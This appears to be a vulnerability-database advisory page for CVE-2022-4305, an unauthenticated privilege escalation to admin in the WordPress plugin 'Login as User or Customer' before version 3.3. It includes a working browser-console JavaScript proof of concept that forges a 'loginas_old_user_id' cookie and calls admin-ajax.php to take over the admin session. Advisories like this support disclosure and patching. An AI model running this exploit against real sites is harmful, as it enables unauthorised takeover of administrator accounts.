Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitDavidWPEX-ID:286D972D-7BDA-455C-A226-FD9CE5F925BD
HistoryDec 27, 2022 - 12:00 a.m.

Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin

2022-12-2700:00:00
David
224
login vulnerability
unauthenticated user
privilege escalation
web browser
developer console
cookie hijacking
wordpress

0.083 Low

EPSS

Percentile

94.4%

JSON

The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.

Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user, then reload the page to be logged in as the user with ID:

document.cookie = "loginas_old_user_id=1";
fetch("/wp-admin/admin-ajax.php?action=loginas_return_admin", {
  "method": "GET",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Related

cvelist 1
wpvulndb 1
prion 1
cve 1
nuclei 1
nvd 1
cvelist
cvelist
CVE-2022-4305 Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin
2023-01-23 14:31:57
wpvulndb
wpvulndb
Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin
2022-12-27 00:00:00
prion
prion
Authorization
2023-01-23 15:15:00
cve
cve
CVE-2022-4305
2023-01-23 15:15:14
nuclei
nuclei
Login as User or Customer < 3.3 - Privilege Escalation
2023-10-17 07:20:28
nvd
nvd
CVE-2022-4305
2023-01-23 15:15:14

0.083 Low

EPSS

Percentile

94.4%

JSON
Related for WPEX-ID:286D972D-7BDA-455C-A226-FD9CE5F925BD
cvelist1wpvulndb1prion1cve1nuclei1nvd1